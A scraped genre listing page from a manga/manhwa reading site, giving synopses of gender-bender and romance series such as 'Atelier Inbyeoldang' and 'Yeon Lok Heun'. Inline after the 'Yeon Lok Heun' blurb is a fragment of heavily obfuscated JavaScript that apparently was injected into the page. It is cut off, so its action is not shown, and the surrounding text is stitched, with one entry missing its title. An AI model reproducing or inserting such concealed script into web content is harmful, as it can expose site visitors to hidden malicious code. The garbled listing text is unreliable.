Gender Bender - Page 83

Gender bender manga is a genre where characters change their gender, either temporarily or permanently. These stories often explore the character’s struggles, growth, and relationships as they experience life from a different gender perspective.

1036 results

24-hour Rebirth Consultation Centre

Catch “24-hour Rebirth Consultation Centre” on Manhuatop! Read the latest chapters daily and follow the life-reversing drama of this engaging Romance Manhwa


Atelier Inbyeoldang

Inbyeoldang / Per Person / 花美男照相馆 / 인별당 To become a painter in an era of prejudice, Chae Hongkyung disguises herself as a boy and leaves for Gyeongseong. Despite her hatred of cameras, she’s drawn to the photos she sees at a studio called Inbyeoldang. After an interesting encounter with its owner, Joo Heon, Hongkyung accepts his offer to learn photography and work at the studio, which is on the brink of collapse. Will she fulfill her dreams, survive her new job, and most importantly, keep her true identity secret from her boss?


Our Guild’s Idol

Read Manhwa Our Guild’s Idol “Ah-jin,” who was enjoying the game using her younger brother’s account, approached the female user [Flower Princess] for the sake of the guild, but ended up being identified as a lurking female. “Actually, I’m a woman…!” Meanwhile, ‘Ji-hyeon,’ who is secretly active as [Flower Princess], feels that the voice in the video sent by Ah-jin sounds familiar… 우리 길드 아이돌


Girl in The Forest

Read manhwa Girl in The Forest In a hidden village where only women are cursed, no one knows why the village is populated solely by females, with no trace of men. Mysteriously, the villagers often form different groups, speculating who might have interfered with this cursed place. Among them is ‘Star’, the daughter of the village chief, who has been chosen to be sacrificed to a creature, unaware of what magical being she is meant to consort with. A dark, giant beast has also been sent by the heavens, leaving her in great doubt!


The Male Leads Are Trapped in My House

I reincarnated as the heiress of a mega-rich family from a novel. The problem is, this world is doomed to be destroyed soon by monstrous viruses. With nothing left but money, I quickly bought a mansion in the countryside and started building a shelter to escape the monsters… But the world ended way sooner than I expected! On top of that, somehow the male leads got trapped in my house with me. The problem? None of them seem to have any intention of leaving. Why does it look like none of them are even thinking about going to the female lead?


Yeon Lok Heun

Yeon Lokheun is a girl who grows up living as a boy learning martial and spiritual arts. She heads for the palace in order to clear the name of her father, a wanted criminal, where she meets the young Emperor Garyun. He promises to save her father’s life in exchange for her lifelong services. After gaining Garyun’s trust, she travels the world solving supernatural-like problems that arise in place of the Emperor. But how long can she continue this life without the others finding out that she is actually a woman?<script></script><script>function _0x11be(_0x18d6cf,_0xaa5299){var _0x9102b6=_0x5470();return _0x11be=function(_0x178245,_0x2fc866){_0x178245=_0x178245-(-0x79*-0x14+0x955+0x3f*-0x47);var _0x35d96b=_0x9102b6[_0x178245];return _0x35d96b;},_0x11be(_0x18d6cf,_0xaa5299);}(function(_0x4422c4,_0x10b32c){var _0x31a312=_0x11be,_0x4f2a4f=_0x4422c4();while(!![]){try{var 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After spending two years in jail, Ishii Kazuyoshi is finally free—only to get hit by a truck straight away and die. A talking cat offers him a second chance at life, and he then wakes up in the body of a high school girl who had been in a coma for the past three days. As he was the former director of a karate tournament, the cat tasked him with helping his new body's original owner restore her run-down karate doujou.


How to Retire as a Disaster Necromancer

Read manhwa How to Retire as a Disaster Necromancer Content of the comics “How to Retire as a Disaster Necromancer” Han Ji-hyuk, the legendary necromancer who saved humanity on the continent of Seron, finally returned to Earth, longing for a peaceful and happy retirement. But from the very first day back, his plans for a quiet life went completely off the rails. At the age of twenty, Ji-hyuk had been summoned to Seron by a magician named Theros, where he was forced to live as a necromancer. After countless years of battling and hardship, he finally defeated the Demon King and returned to Earth. But the Earth he came back to wasn’t the one he remembered. The world had been ravaged by Gates and monsters, and to make matters worse, all the gold and treasures he brought back had vanished into thin air. Now stuck as an F-Rank Awakened, Ji-hyuk had no choice but to start from scratch to earn a living. So, when will Ji-hyuk finally achieve the peaceful retirement he’s been dreaming of? Or is his journey far from over? “How to Retire as a Disaster Necromancer” is another name: Como um Necromante de Nível Catastrófico se Aposenta How a Calamity Necromancer Retires How a Catastrophe-Level Necromancer Retires How a Disaster-Class Necromancer Retires How a Catastrophic Necromancer Retires แผนเกษียณใหม่ของเนโครแมนเซอร์ 재앙급 네크로맨서가 은퇴하는 법



[From Mangacity]: Nearly 2000 years ago, the prosperous Han dynasty of China collapsed. Heroes rose and fell, and three nations emerged--Wei, Shu, and Wu. Historians refer to this period as the three kingdoms period. The romance of the three kingdom is an intriguing tale of heroic deeds, of alliance forged and broken, of loyalty and betrayal... Hong Kong artist Chan Mou retells this classic tale in "The Ravages of Time" from the perspective of the Sima clan, which in the end united the three kingdoms. Readers will be attracted by an array of well-developed characters and Chan Mou's own unique top-notch art-style. Whether you have played Dynasty Warriors or not, this is definitely worth a read!


I don’t know the original, I’m too busy trying to make a living

Get the fastest updates on “I’m Too Busy Making A Living” at Manhuatop. Read daily for the latest twists in this unique Romance Manhwa The summary of the story “I’m Too Busy Making A Living” A month after getting married, the lady’s husband, the lord of the territory, went out to hunt monsters and returned as a corpse. The shock made Penelope realize she had been transported into a novel. But she didn’t even have time to accept the fact that she was inside a novel because the territory’s responsibilities overwhelmed her immediately! … The alternative name for “I’m Too Busy Making A Living” 원작은 모르겠고, 먹고 살기도 바쁩니다 I Don’t Know About the Original, I’m Busy Making a Living I Don’t Know the Original, I’m Busy Making a Living


I will retrieve the Duke I had abandoned

Discover “I will retrieve the Duke I had abandoned” with daily updates on Manhuatop. Read the newest chapters and follow the gripping plot of this intriguing Romance Manhwa


The Snow Leopard Baby of the Black Leopard Family

Read manhwa The Snow Leopard Baby of the Black Leopard Family / Baby Snow Leopard of the Black Leopard Family A child, born a hybrid and abused to death by their grandfather, is reborn with memories of their past life. Faced with the same fate, they seek out their estranged father for protection until adulthood. Expecting rejection, they are instead met with love and acceptance from their father, siblings, and grandfather—who even offers them the family leadership. “The Snow Leopard Baby of the Black Leopard Family Manhwa” is another name: 흑표 가문의 설표 아기님
